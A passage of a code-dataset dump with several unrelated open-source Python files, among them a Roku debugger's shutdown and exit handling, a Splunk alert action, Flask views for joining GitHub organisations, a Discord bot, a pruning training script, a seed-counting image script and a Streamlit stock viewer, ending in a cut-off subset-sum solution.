__check_protocol_version(self, debugger_client, print_warnings=False):\n check_debuggee_protocol_version(debugger_client.protocol_version)\n if print_warnings and \\\n (global_config.verbosity > Verbosity.ERRORS_ONLY):\n if self.options.stop_target_on_launch and \\\n not debugger_client.has_feature(\n ProtocolFeature.STOP_ON_LAUNCH_ALWAYS):\n print('warn: disabling stop-on-launch'\n ' (unsupported by debuggee)')\n self.options.stop_target_on_launch = False\n\n # Returns path to tmp file. File will be deleted when this script exits\n def create_temp_file(self):\n fileInfo = mkstemp()\n os.close(fileInfo[0])\n self.__tmp_files.append(fileInfo[1])\n return fileInfo[1]\n\n # Blocks until all daemon threads have exited\n def shutdown(self):\n try:\n if self.__check_debug(2):\n print('debug: RokuDebug:shutdown() start')\n self.__shutdown_impl()\n if self.__check_debug(2):\n print('debug: RokuDebug:shutdown() complete')\n\n # Catch and print any exception here, because if daemon threads\n # have not yet exited, the python interpreter may freak out\n # and choose to dump core rather than printing the exception.\n except BaseException as e:\n traceback.print_exc(file=sys.stderr)\n print('INTERNAL ERROR: exception in shutdown(): {}'.format(e),\n file=sys.stderr)\n\n # Blocks until all daemon threads have exited\n def __shutdown_impl(self):\n wait_for_cli_shutdown = False\n with self.__lifecycle_lock:\n if self.__is_shut_down:\n return\n\n # Disable reporting errors that normally occur during shutdown\n if self.__debugger_client:\n self.__debugger_client.set_suppress_connection_errors(True)\n\n # Shut down user interface\n if self.__cli:\n self.__cli.shutdown_async()\n self.__cli = None\n wait_for_cli_shutdown = True\n\n # Shut down the connection to the debug target\n # Close the debugger client explicitly, in case the user\n # interface has not been created (e.g., on a protocol mismatch)\n if self.__debugger_client:\n self.__debugger_client.shutdown()\n self.__debugger_client = None\n\n if wait_for_cli_shutdown:\n with self.__lifecycle_cond_var:\n while self.__is_cli_running:\n self.__lifecycle_cond_var.wait(1.0)\n\n with self.__lifecycle_lock:\n # Clean up tmp files and whatnot\n self.cleanup()\n self.__is_shut_down = True\n\n # Cleanup tmp files, etc\n # This is often called twice during process exit: once while shutting\n # down this debugger, and once as python atexit hook\n def cleanup(self):\n if self.__check_debug(2):\n print('debug: RokuDebug: cleanup()')\n with self.__lifecycle_lock:\n for tmp_file in self.__tmp_files:\n if (os.path.exists(tmp_file)):\n print(\"removing temp file: {:s}\".format(tmp_file))\n os.remove(tmp_file)\n self.__tmp_files = []\n\n # Sets the exit code that will be returned by this process to the OS,\n # overriding any value sent to do_exit(). This should only be called\n # when the exit sequence has begun.\n # @return the actual exit_code\n def set_exit_code(self, exit_code):\n # Locking is by far preferred, but don't deadlock during shutdown\n # sequence.\n locked = self._exit_cond_var.acquire(blocking=True, timeout=0.1)\n try:\n return self._set_exit_code_nolock(exit_code)\n finally:\n if locked:\n self._exit_cond_var.release()\n\n # Always creates self.__test_mgr. 
If test directories have been specified,\n # loads the tests in those directories.\n def __init_test_mgr(self) -> None:\n if self.__check_debug(1): # 1 = validation\n assert not self.__test_mgr\n\n if self.__test_dirs:\n self.__test_mgr = TestManager(self.get_tmp_dir_path())\n if global_config.verbosity >= Verbosity.NORMAL:\n print('info: loading tests')\n for test_dir in self.__test_dirs:\n self.__test_mgr.load_dir(test_dir)\n else:\n self.__test_mgr = NullTestManager()\n\n if self.__run_test_name:\n if not self.__test_mgr.set_current_test(self.__run_test_name):\n print('FATAL: Test not found: {}'.format(self.__run_test_name))\n raise ThreadExit(1)\n\n if self.__test_mgr.get_current_test():\n test = self.__test_mgr.get_current_test()\n self.options.channel_file = self.__test_mgr.get_test_channel_package_path(test)\n self.options.stop_target_on_launch = test.stop_channel_on_launch\n\n if self.__check_debug(1): # 1 = validation\n assert self.__test_mgr\n\n return None\n\n # @return the new exit code\n # @see set_exit_code()\n def _set_exit_code_nolock(self, exit_code):\n if self.__check_debug(1):\n # This thread may have legitimately failed to get the lock\n assert not self._exit_cond_var.acquire(blocking=False), \\\n '*MAYBE* a locking problem in exit handling'\n\n if self._exit_code == None:\n self._exit_code = exit_code\n\n if self.__check_debug(2):\n print('debug: set_exit_code({}) -> {}'.format(exit_code,\n self._exit_code))\n return self._exit_code\n\n # Always called on main thread (the same one that called main())\n def _signal_handler(self, signum, frame):\n\n debug_level = global_config.debug_level\n if debug_level >= 2:\n ident = None\n for key,value in self.__signal_name_to_enum.items():\n if value == signum:\n ident = key\n print('debug: dumping stack traces on signal {},ident={}'.format(\n signum, ident))\n traceback.print_stack()\n\n # Local reference to avoid race to destruction\n cli = self.__cli\n exitNow = False\n name_to_enum = self.__signal_name_to_enum\n if (signum == name_to_enum[SIGHUP_LITERAL]) or \\\n (signum == name_to_enum[SIGTERM_LITERAL]):\n if cli:\n cli.shutdown_async()\n else:\n exitNow = True\n elif (signum == name_to_enum[SIGINT_LITERAL]) or \\\n (signum == name_to_enum[CTRL_BREAK_EVENT_LITERAL]) or \\\n (signum == name_to_enum[CTRL_C_EVENT_LITERAL]):\n if cli:\n cli.stop_target()\n else:\n exitNow = True\n else:\n if debug_level >= 1:\n print('debug: main: ignoring signal {}'.format(\n signum))\n if exitNow:\n do_exit(1, 'Exiting on signal {}'.format(signum))\n\n def __check_debug(self, min_level):\n lvl = max(global_config.debug_level, self._debug_level)\n if lvl: assert global_config.debug_level >= 0 and self._debug_level >= 0 and min_level >= 1\n return lvl >= min_level\n\n\n# END class RokuDebug\n\nclass _NullOutputController(object):\n\n def __init__(self):\n super().__init__()\n self.localerr = sys.stderr\n self.localout = sys.stdout\n self.targeterr = sys.stderr\n self.targetout = sys.stdout\n\n\n# Always called on main thread (the same thread that invoked main())\ndef _global_signal_handler(signum, frame):\n _rokudebug_main._signal_handler(signum, frame)\n\ndef exit_handler():\n # print('debug: main: exit_handler()',file=sys.__stdout__)\n _rokudebug_main.cleanup()\n\n# Sets the exit code that will be returned by this process to the OS,\n# overriding any value sent to do_exit(). 
This should only be called\n# when the exit sequence has begun.\n# @return the actual exit_code\ndef set_exit_code(exit_code):\n global _rokudebug_main\n if _rokudebug_main:\n _rokudebug_main.set_exit_code(exit_code)\n else:\n if global_config.debug_level >= 1:\n raise AssertionError(\n 'set_exit_code() called with no RokuDebug instance')\nglobal_config.set_exit_code = set_exit_code # make this available to all modules\n\n# NB: python's SystemExit exception only exits one thread, so it is\n# universally referred to as 'ThreadExit' in this set of scripts.\n#\n# This may be called on any thread and starts the shutdown sequence\n# to exit this process. On the main thread, this throws a ThreadExit\n# (AKA SystemExit) exception. On other threads, it sets the state and\n# returns so the main thread can take care of the shutdown.\n#\n# If a shutdown is already in progress, additional calls to this function\n# on non-main threads are ignored and assumed to be cascading errors (e.g.,\n# I/O errors after sockets have been closed).\n#\n# This deals with Python's goofy exit handling. There appears to be no way\n# for a thread other than main to cleanly exit this process. That's because\n# sys.exit() raises a ThreadExit exception that is ignored, unless it is\n# raised on the thread that called main(). Using os._exit() is not\n# a good idea, because that does not invoke shutdown hooks.\n# @see set_exit_code()\ndef do_exit(exit_code, msg=None) -> None:\n global _rokudebug_main\n exit_code_at_entry = exit_code\n on_main_thread = threading.current_thread() is threading.main_thread()\n if global_config.debug_level >= 2:\n print('debug: do_exit({}) onmainthread:{}'.format(\n exit_code_at_entry, on_main_thread))\n\n # Coordinate exit parameters with other threads\n #\n # If the exit lock cannot be acquired, proceed while unlocked\n # That's scary but we cannot lock up permanently while exiting\n\n condition = _rokudebug_main._exit_cond_var\n locked = condition.acquire(blocking=True, timeout=1)\n try:\n if global_config.debug_level >= 1: # 1 = internal validation\n assert locked\n if _rokudebug_main._exit_now:\n # Shutdown has started\n if global_config.debug_level >= 2 and msg:\n print('debug: ignoring exit msg after shutdown started: {}'.format(msg))\n msg = None # Don't report cascading errors during shutdown\n exit_code = _rokudebug_main._exit_code # exit code was already set\n else:\n # Shutdown has not started (let's start it)\n _rokudebug_main._exit_now = True\n _rokudebug_main._exit_code = exit_code\n\n finally:\n if locked:\n condition.release()\n locked = False\n\n # Print the message, if provided\n\n if global_config.debug_level >= 2:\n # Make output easier to read\n # Don't do this at debug level 1, which is validation only\n sys.stdout.flush()\n sys.stderr.flush()\n if msg:\n out = sys.stdout\n if (exit_code):\n out = sys.stderr\n if not msg.startswith('FATAL'):\n msg = 'FATAL: {}'.format(msg)\n print(msg, file=out)\n\n if on_main_thread:\n # This is the only thread that can actually exit this process\n # raises ThreadExit exception\n sys.exit(exit_code)\nglobal_config.do_exit = do_exit # make this available to all modules\n\ndef is_exiting() -> bool:\n global _rokudebug_main\n\n # If the exit lock cannot be acquired, proceed while unlocked\n # That's scary but we cannot lock up permanently while exiting\n condition = _rokudebug_main._exit_cond_var\n locked = condition.acquire(blocking=True, timeout=1)\n try:\n return _rokudebug_main._exit_now\n finally:\n if locked:\n condition.release()\n 
locked = False\nglobal_config.get_is_exiting = is_exiting\n","repo_name":"rokudev/remote-debugger","sub_path":"lib/rokudebug/RokuDebug.py","file_name":"RokuDebug.py","file_ext":"py","file_size_in_byte":47619,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"44"} +{"seq_id":"9654639773","text":"import sys\nimport logging\nimport em_constants as EMConstants\nimport json\nimport splunk.rest as rest\nimport em_common as EMCommon\nfrom abc import ABCMeta, abstractmethod\n\n\nclass AbstractCustomAlertAction(object):\n \"\"\"\n Abstract class holds common opetations across alert actions.\n \"\"\"\n __metaclass__ = ABCMeta\n\n def process_payload(self, payload):\n \"\"\"\n Fetches the search results by using the sid from the payload\n \"\"\"\n sid = payload.get('sid')\n search_name = payload.get('search_name')\n session_key = payload.get('session_key')\n\n logging.error('INFO custom alert action em_write_alerts triggered, search_name = %s' % search_name)\n endpoint = EMConstants.SEARCH_RESULTS_ENDPOINT % (EMCommon.get_server_uri(), EMConstants.APP_NAME, sid)\n getargs = {'output_mode': 'json', 'count': 0}\n _, content = rest.simpleRequest(endpoint, session_key, method='GET', getargs=getargs)\n return json.loads(content)\n\n def run(self):\n \"\"\"\n called in the __main__ block of each the alert action.\n \"\"\"\n # logging setup\n sh = logging.StreamHandler()\n log = logging.getLogger()\n log.setLevel(logging.INFO)\n log.addHandler(sh)\n\n # run the script\n if len(sys.argv) > 1 and sys.argv[1] == '--execute':\n try:\n payload = json.loads(sys.stdin.read())\n self.execute_action(payload)\n except Exception as e:\n logging.error(e)\n sys.exit(3)\n else:\n logging.error('FATAL Unsupported execution mode (expected --execute flag)')\n sys.exit(1)\n\n def execute_action(self, payload):\n \"\"\"\n Processes the payload and calls the alert specific execute function to perform actions\n on the search results\n \"\"\"\n content = self.process_payload(payload)\n results = content['results']\n self.execute(results, payload)\n\n @abstractmethod\n def execute(self, result, payload):\n \"\"\"\n All child class should override this method to perform custom actions on the results\n \"\"\"\n raise NotImplemented(\"Abstract method not implemented\")\n","repo_name":"jljfoto/SplunkEtc","sub_path":"apps/splunk_app_infrastructure/bin/em_abstract_custom_alert_action.py","file_name":"em_abstract_custom_alert_action.py","file_ext":"py","file_size_in_byte":2235,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"14328971983","text":"import logging\n\nfrom flask import Blueprint, current_app, redirect, render_template, request, session\n\nfrom landing_page_app.main.middleware.auth import requires_auth\nfrom landing_page_app.main.scripts.join_github_form_auth0_user import (\n JoinGithubFormAuth0User,\n)\n\nlogger = logging.getLogger(__name__)\n\nAUTHLIB_CLIENT = \"authlib.integrations.flask_client\"\n\nmain = Blueprint(\"main\", __name__)\n\n\n@main.route(\"/\")\ndef index():\n return render_template(\"pages/home.html\")\n\n\n@main.route(\"/join-github\")\ndef join_github_info_page():\n return render_template(\"pages/join-github.html\")\n\n\n@main.route(\"/thank-you\")\ndef thank_you():\n return render_template(\"pages/thank-you.html\")\n\n\ndef error(error_message):\n logger.error(error_message)\n return render_template(\n \"pages/errors/internal-error.html\", error_message=error_message\n )\n\n\ndef 
_join_github_auth0_users(request):\n form = JoinGithubFormAuth0User(request.form)\n if request.method == \"POST\" and form.validate() and form.validate_org():\n selected_orgs = current_app.github_script.get_selected_organisations(\n form.access_moj_org.data, form.access_as_org.data\n )\n\n if current_app.github_script.is_github_seat_protection_enabled() is True:\n return error(\"GitHub Seat protection enabled\")\n\n username = form.gh_username.data\n if len(username) > 0:\n if current_app.github_script.validate_user_rejoining_org(\n selected_orgs, username\n ):\n current_app.github_script.add_returning_user_to_github_org(\n username, selected_orgs\n )\n else:\n return error(\n \"Username not found or has expired. Create a new request and leave the username box empty.\"\n )\n else:\n user_email = session[\"user\"][\"userinfo\"][\"email\"]\n current_app.github_script.add_new_user_to_github_org(\n user_email, selected_orgs\n )\n\n return redirect(\"thank-you\")\n\n # Problem in the form\n return render_template(\n \"pages/join-github-auth0-user.html\",\n form=form,\n template=\"join-github-auth0-user.html\",\n )\n\n\n@main.route(\"/join-github-auth0-user\", methods=[\"GET\", \"POST\"])\n@requires_auth\ndef join_github_auth0_users():\n return _join_github_auth0_users(request)\n","repo_name":"ministryofjustice/operations-engineering-landing-page-poc","sub_path":"landing_page_app/main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2388,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"71626258373","text":"import asyncio\n\nimport discord\nfrom discord.ext import commands, tasks\n\nimport os\nimport typing\n\n\nasync def _get_cog_file_dirs(base_dir: str, return_list: typing.Optional[typing.List[str]] = []) -> typing.List[str]:\n for filename in os.listdir(base_dir):\n if os.path.isdir(f\"{base_dir}/{filename}\"):\n await _get_cog_file_dirs(f\"{base_dir}/{filename}\", return_list=return_list)\n elif filename.endswith(\".py\"):\n return_list.append(f\"{base_dir}/{filename}\")\n return return_list\n\n\nasync def _change_filepath_to_python_path(path: str) -> str:\n return \".\".join(os.path.normpath(path).split(os.sep))[:-3]\n\n\nclass Nubot(commands.Bot):\n\n def __init__(self) -> None:\n super().__init__(intents=discord.Intents.all(), command_prefix=\"0\", help_command=None)\n self.__COG_DIR_NAME: str = \"scripts/cogs\"\n self.__COG_DIR: str = \"scripts.cogs\"\n\n async def add_cogs(self) -> None:\n cog_paths: typing.List[str] = await _get_cog_file_dirs(\"scripts/cogs\")\n\n for i in range(len(cog_paths)):\n cog_paths[i] = await _change_filepath_to_python_path(cog_paths[i])\n\n for cog in cog_paths:\n print(f\"-> Loading cog: `{cog}`\", end=\" \")\n await self.load_extension(cog)\n print(\"Finished\")\n\n async def setup_hook(self) -> None:\n print(\"Starting setup_hook...\")\n await self.add_cogs()\n print(\"-> Starting snake...\", end=\" \")\n self.get_cog(\"Snake\").move.start()\n print(\"Finished\")\n self.sync_commands.start()\n print(\"Finished setup_hook\")\n\n @tasks.loop(minutes=1.0, count=1)\n async def sync_commands(self) -> None:\n print(\"Starting syncing task...\")\n print(\"-> Waiting for the bot to log in...\")\n await self.wait_until_ready()\n guild: discord.Guild\n for guild in self.guilds:\n print(f\"-> Syncing application commands for guild with ID: {guild.id}\", end=\" \")\n self.tree.copy_global_to(guild=guild)\n print(\"Finished\")\n await self.tree.sync()\n print(\"Finished syncing 
task\")\n","repo_name":"ciufcia/Nubot","sub_path":"scripts/nubot.py","file_name":"nubot.py","file_ext":"py","file_size_in_byte":2112,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"44"} +{"seq_id":"16346706106","text":"import sys\n\nimport gi\n\ngi.require_version(\"Gtk\", \"3.0\")\nfrom gi.repository import Gtk, Gio\n\nclass App(Gtk.Application):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, application_id=\"com.shellfox.seettings\", **kwargs)\n self.window = None\n\n def do_activate(self):\n if not self.window:\n builder = Gtk.Builder()\n builder.add_from_file('./app.ui')\n self.window = builder.get_object(\"main\")\n self.add_window(self.window)\n\n self.window.show_all()\n\n\nif __name__ == '__main__':\n app = App()\n app.run(sys.argv)\n","repo_name":"naoufalzerai/Dashboard-gtk","sub_path":"header.py","file_name":"header.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"70757652934","text":"import os\nimport random\n\nimport numpy\nimport torch\n\nfrom config import LOGS_ROOT\nfrom utilities import *\n\n\ndef main(args):\n # Reproducibility\n random.seed(args.seed)\n torch.manual_seed(args.seed)\n torch.cuda.manual_seed(args.seed)\n numpy.random.seed(args.seed)\n torch.backends.cudnn.deterministic = True\n torch.backends.cudnn.benchmark = False\n \n # Get Model and Dataset\n model = get_model(args)\n train_loader, valid_loader, test_loader = get_dataloaders(args)\n \n torch.save(model.state_dict(), os.path.join(LOGS_ROOT, args.dataset, args.name, \"models\", \"init.pt\"))\n \n # Optimizers\n pytorch_optmizer, sensitivity_optmizer = get_optimizers(args, model)\n \n # SummaryWriter\n tb_writer = get_tb_writer(args)\n \n # Train the model\n if args.batch_pruning:\n train_model_batch_pruning(args, model, train_loader, valid_loader, test_loader, pytorch_optmizer,\n sensitivity_optmizer, tb_writer)\n else:\n train_model_epoch_pruning(args, model, train_loader, valid_loader, test_loader, pytorch_optmizer,\n sensitivity_optmizer, tb_writer)\n \n torch.save(model.state_dict(), os.path.join(LOGS_ROOT, args.dataset, args.name, \"models\", \"end.pt\"))\n\n\nif __name__ == '__main__':\n # Parse arguments\n args = parse_args()\n \n main(args)\n","repo_name":"EIDOSLAB/LOBSTER","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1376,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"44"} +{"seq_id":"43747766853","text":"from PIL import Image, ImageDraw, ImageOps,ImageFilter\nfrom skimage.measure import label, regionprops\nfrom skimage.morphology import closing, square\nfrom skimage.color import label2rgb\nfrom numpy import array\nimport numpy as np\nimport networkx as nx\nimport matplotlib.pyplot as plt\nimport matplotlib.patches as patches\n\ndef mask(low, high):\n\treturn [255 if low <= x <= high else 0 for x in range(0, 256)]\n\nUMBRAL = [(0,30), (0,30), (0,30)]\nclass Semillero(object):\n\tdef __init__(self, archivo):\n\t\tself.archivo = archivo\n\t\tself.img = Image.open(archivo)\n\t\tsize = self.img.size\n\t\t# print(self.img.size)\n\t\ttam = 1600\n\t\tself.img = self.img.resize((tam, int(size[1] * tam / size[0]))) if size[0] > size[1] else self.img.resize((int(size[0] * tam / size[1]),tam))\n\t\t# self.img = self.img.filter(ImageFilter.UnsharpMask(6,80))\n\t\t# self.img = self.img.filter(ImageFilter.GaussianBlur())\n\t\t# self.img = 
self.img.filter(ImageFilter.UnsharpMask(4))\n\t\ttamfilter = 3\n\t\tself.img = self.img.filter(ImageFilter.RankFilter(tamfilter, int(tamfilter*tamfilter/2)))\n\t\t# self.img = ImageOps.equalize(self.img)\n\t\t# self.img = ImageOps.autocontrast(self.img)\n\t\t# print(self.img.size)\n\t\tself.regiones = []\n\tdef BuscarRegiones(self):\n\t\tmask_R = mask(UMBRAL[0][0], UMBRAL[0][1])\n\t\tmask_G = mask(UMBRAL[1][0], UMBRAL[1][1])\n\t\tmask_B = mask(UMBRAL[2][0], UMBRAL[2][1])\n\t\tself.img_binary = self.img.point(mask_R+mask_G+mask_B).convert('L').point([0]*255+[255])\n\t\tself.img_binary.save(\"binario.jpg\")\n\t\tself.img_binary = self.img_binary.filter(ImageFilter.MaxFilter(5))\n\t\tself.img_binary = self.img_binary.filter(ImageFilter.MinFilter(5))\n\t\tself.img_binary.save(\"binario2.jpg\")\n\t\tarr_binary = array(self.img_binary)\n\t\tarr_closed = closing(arr_binary)\n\t\tarr_labeled = label(arr_closed)\n\t\tself.regiones = regionprops(arr_labeled)\n\tdef PromedioArea(self):\n\t\t# print(\"Calculando\")\n\t\tself.prom = -1\n\t\tself.std = -1\n\t\tvalores = []\n\t\twhile self.std > self.prom * .5 or self.std == -1:\n\t\t\tvalores = []\n\t\t\tfor region in self.regiones:\n\t\t\t\tif (region.area > self.prom + self.std or region.area < self.prom - self.std) and self.prom != -1 and self.std != -1:\n\t\t\t\t\tcontinue\n\t\t\t\tvalores.append(region.area)\n\t\t\tself.prom = np.mean(valores)\n\t\t\tself.std = np.std(valores)\n\t\tself.minimo = min(valores)\n\t\t\t# print(\"Promedio\", self.prom,\"std\",self.std, valores)\n\tdef Validas(self):\n\t\treturn [ region for region in self.regiones if region.area < self.prom + self.std and region.area > self.prom - self.std ]\n\tdef Procesar(self):\n\t\t# print(\"Procesando\")\n\t\tself.BuscarRegiones()\n\t\tself.PromedioArea()\n\t\tvalidas = self.Validas()\n\t\tprint(\"Cantidad validas\", len(validas))\n\t\tfig, ax = plt.subplots()\n\t\tfor p in [\n\t\t [patches.Rectangle(\n\t\t (r.bbox[1], r.bbox[0]),\n\t\t r.bbox[3] - r.bbox[1],\n\t\t r.bbox[2] - r.bbox[0],\n\t\t fill=False,\n\t\t edgecolor='blue',\n\t\t alpha=.4\n\t\t ), r.centroid] for r in validas]: \n\t\t ax.add_patch(p[0])\n\t\t # plt.plot(p[1][1], p[1][0], 'bo')\n\t\tresto = [region for region in self.regiones if region not in validas and region.area > self.minimo - self.std]\n\t\tprint(\"restos posibles\", len(resto))\n\t\tfor p in [\n\t\t\t[patches.Rectangle(\n\t\t (r.bbox[1], r.bbox[0]),\n\t\t r.bbox[3] - r.bbox[1],\n\t\t r.bbox[2] - r.bbox[0],\n\t\t fill=False,\n\t\t edgecolor='red',\n\t\t alpha=.4\n\t\t ), r.centroid, r.image] for r in resto]:\n\t\t ax.add_patch(p[0])\n\t\t # plt.plot(p[1][1], p[1][0], 'ro')\t\n\t\tplt.imshow(self.img)\n\t\tplt.show()\nSemillero(\"imagen/IMG_20180118_090124.jpg\").Procesar()\n# Semillero(\"imagen/50.jpg\").Procesar()\n","repo_name":"Francuchin/semillero","sub_path":"trash/conteo.py","file_name":"conteo.py","file_ext":"py","file_size_in_byte":3561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"38258964505","text":"from typing import List\n\nfrom .base import UPipeEntity\n\n\nclass ResourceType:\n NODE = 'node'\n CPU = 'cpu'\n GPU = 'gpu'\n TPU = 'tpu'\n MEMORY = 'memory'\n NETWORK_IO = 'network_io'\n DISK_IO = 'disk_io'\n STANDARD_STORAGE = 'standard_storage'\n SSD_STORAGE = 'ssd_storage'\n\n\nclass APINodeResource(UPipeEntity):\n type: str # ResourceType\n id: str\n name: str\n size: float = -1\n\n\nclass APINode(UPipeEntity):\n controller: bool\n controller_host: str = None\n controller_port: 
int = None\n resources: List[APINodeResource] = []\n","repo_name":"dataloop-ai/dtlpy-upipe","sub_path":"dataloop/upipe/types/node.py","file_name":"node.py","file_ext":"py","file_size_in_byte":565,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"44"} +{"seq_id":"11560141535","text":"from src.composition import Composition\nfrom src.liquid_chemistry import LiquidActivity\nfrom src.gas_chemistry import GasPressure\nfrom src.thermosystem import EquilibriumThermoSystem\nfrom src.report import Report\nfrom src.plots import collect_data, make_figure\n\nfrom random import uniform\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport labellines\n\n\"\"\"\nThis script shows how to run MAGMApy given a temperature path path.\n\"\"\"\n\nmax_temperature = 4200 # K\nmin_temperature = 1800 # K\ntemperature_increment = 200 # K\ntitle = \"MAG18\"\n\n# BSE composition, Visccher & Fegley 2013\ncomposition = {\n \"SiO2\": 45.40,\n 'MgO': 36.76,\n 'Al2O3': 4.48,\n 'TiO2': 0.21,\n 'Fe2O3': 0.00000,\n 'FeO': 8.10,\n 'CaO': 3.65,\n 'Na2O': 0.349,\n 'K2O': 0.031,\n 'ZnO': 6.7e-3,\n}\n\nmajor_gas_species = [\n \"SiO\", \"O2\", \"MgO\", \"Fe\", \"Ca\", \"Al\", \"Ti\", \"Na\", \"K\", \"Zn\"\n]\n\nc = Composition(\n composition=composition\n)\n\ng = GasPressure(\n composition=c,\n major_gas_species=major_gas_species,\n minor_gas_species=\"__all__\",\n)\n\nl = LiquidActivity(\n composition=c,\n complex_species=\"__all__\",\n gas_system=g\n)\n\nt = EquilibriumThermoSystem(composition=c, gas_system=g, liquid_system=l)\n\nreports = Report(composition=c, liquid_system=l, gas_system=g, thermosystem=t)\n\ncount = 1\nfor temperature in reversed(\n np.arange(min_temperature, max_temperature + temperature_increment, temperature_increment)):\n l.calculate_activities(temperature=temperature)\n g.calculate_pressures(temperature=temperature, liquid_system=l)\n if l.counter == 1:\n l.calculate_activities(temperature=temperature)\n g.calculate_pressures(temperature=temperature, liquid_system=l)\n t.vaporize()\n l.counter = 0 # reset Fe2O3 counter for next vaporization step\n print(\"[~] At iteration: {} (Weight Fraction Vaporized: {} %) (temperature: {} K)\".format(count,\n t.weight_fraction_vaporized * 100.0,\n temperature))\n # if count % 5 == 0 or count == 1:\n reports.create_composition_report(iteration=count)\n reports.create_liquid_report(iteration=count)\n reports.create_gas_report(iteration=count)\n count += 1\n\n\ndef get_annotation_location(species, x_data, y_data, target_x):\n if species == \"MgO\":\n target_x = 0.70\n elif species == \"Na\":\n target_x = 0.22\n min_diff = 10 * 10 ** 10\n x = None\n y = None\n for index, i in enumerate(x_data):\n diff = abs(i - target_x)\n if diff < min_diff:\n min_diff = diff\n x = i\n y = y_data[index] + .001\n return x, y\n\n\nfig = plt.figure()\nax = fig.add_subplot(111)\nax.set_xlabel(\"Temperature (K)\")\nax.set_ylabel(\"Partial Pressure\")\nax.set_title(f\"Vapor Composition - {title}\")\n# ax.set_ylim(-3, 0)\ndata = collect_data(path=\"reports/partial_pressures\", x_header='temperature (K)')\n# get a unique color for each species\ncolors = plt.cm.jet(np.linspace(0, 1, len(data[list(data.keys())[0]])))\nfor index, i in enumerate(data[list(data.keys())[0]]):\n if \"_l\" not in i:\n linewidth = 1.0\n label = i.split(\"_\")[0]\n color = colors[index]\n if \"K\" in i:\n linewidth = 2.0\n label = fr'$\\bf{label}$'\n color = 'red'\n x_data = [j for j in data.keys()]\n y_data = []\n tmp = [data[j][i] for j in data.keys()]\n for j in tmp:\n 
if j > 0:\n # y_data.append(log10(j))\n y_data.append(j)\n else:\n y_data.append(np.nan)\n ax.plot(\n x_data,\n y_data,\n linewidth=linewidth,\n color=color,\n label=label\n )\n # ax.annotate(i, get_annotation_location(species=i, x_data=x_data, y_data=y_data, target_x=1850))\n# plot the total pressure\nax.plot(\n data.keys(),\n [sum([j for key, j in i.items() if \"_l\" not in key]) for i in data.values()],\n linewidth=1.0,\n color='k',\n label=\"Total\"\n)\n\nlabellines.labelLines(ax.get_lines(), zorder=2.5, align=True,\n xvals=[uniform(3000, max_temperature) for i in ax.get_lines()], fontsize=8)\nax.set_xlim(min_temperature, max_temperature)\nax.set_ylim(10 ** -6, 100)\nax.grid()\nax.set_yscale('log')\nax.yaxis.tick_right()\nplt.tight_layout()\nplt.show()\n","repo_name":"ScottHull/MAGMApy","sub_path":"test_equilibrium.py","file_name":"test_equilibrium.py","file_ext":"py","file_size_in_byte":4445,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"28237582021","text":"import yfinance as yf\nimport pandas as pd\nimport altair as alt\nimport streamlit as st \n\nst.title('あっきーの米国株')\n\nst.sidebar.write(\"\"\"\n# あっきー厳選米国株\nこちらは株価可視化ツールです。以下のオプションから表示日数を選んでください\n\"\"\")\nst.sidebar.write(\"\"\"\n## 表示日数選択\n\"\"\")\ndays= st.sidebar.slider(\"日数\",1,200,50)\n#min:1, max:200, default:50\n\nst.write(f\"\"\"\n過去 **{days}日間** のあっきー保有銘柄の株価\n\"\"\")\n\n@st.cache\ndef get_data(days, TS):\n df =pd.DataFrame()\n for comp in TS.keys():\n tkr = yf.Ticker(TS[comp])\n hist = tkr.history(period=f'{days}d')\n hist.index = hist.index.strftime('%d %B %Y')\n hist=hist[['Close']]\n hist.columns=[comp]\n hist=hist.T\n hist.index.name='company'\n df = pd.concat([df,hist])\n return df\n\n\n\ntry:\n st.sidebar.write(\"\"\"\n ## 株価の範囲を指定してください(USD) \n \"\"\")\n ymin, ymax =st.sidebar.slider('範囲',0,800,(0,500))\n #デフォルトの最小を0, 最大を500に設定\n\n TS={\n 'APPLE':'AAPL',\n 'VTI (ETF)':'VTI',\n 'UNITY SOFTWARE':'U',\n 'C3 AI':'AI',\n 'ZOOM':'ZM',\n 'ZOOMINFO':'ZI',\n 'ROYALITY PHARMA':'RPRX',\n 'PINTEREST':'PINS',\n 'DELTA AIR LINES':'DAL', \n }\n\n df=get_data(days, TS)\n\n companies= st.multiselect(\n '会社名を選択してください',\n list(df.index),\n ['VTI (ETF)','ZOOM','APPLE']\n )\n\n if not companies:\n st.error('少なくとも一社は選んでください')\n else:\n data=df.loc[companies]\n st.write(\"### 株価(USD)\",data.sort_index())\n data= data.T.reset_index()\n data=pd.melt(data,id_vars=['Date'])\n data= data.rename(columns={'value':'Stock prices(USD)'})\n chart=(\n alt.Chart(data)\n .mark_line(opacity=0.8, clip =True)\n .encode(\n x=\"Date:T\",\n y=alt.Y(\"Stock prices(USD):Q\", stack=None, scale=alt.Scale(domain=[ymin,ymax])),\n color='company:N'\n )\n )\n st.altair_chart(chart, use_container_width=True)\nexcept:\n st.error(\"何かエラーが起きたようです!\")\n","repo_name":"Akkey2021/streamlit1","sub_path":"kabuka.py","file_name":"kabuka.py","file_ext":"py","file_size_in_byte":2273,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"9474646321","text":"N, S = map(int, input().split())\n\nnum_list = list(map(int, input().split()))\n\nanswer = 0\n\n\ndef dfs(temp_sum, now_idx):\n global answer\n if temp_sum == S:\n answer += 1\n if now_idx == N - 1:\n return\n\n for next_idx in range(now_idx + 1, N):\n dfs(temp_sum + num_list[next_idx], next_idx)\n\n\nfor idx in 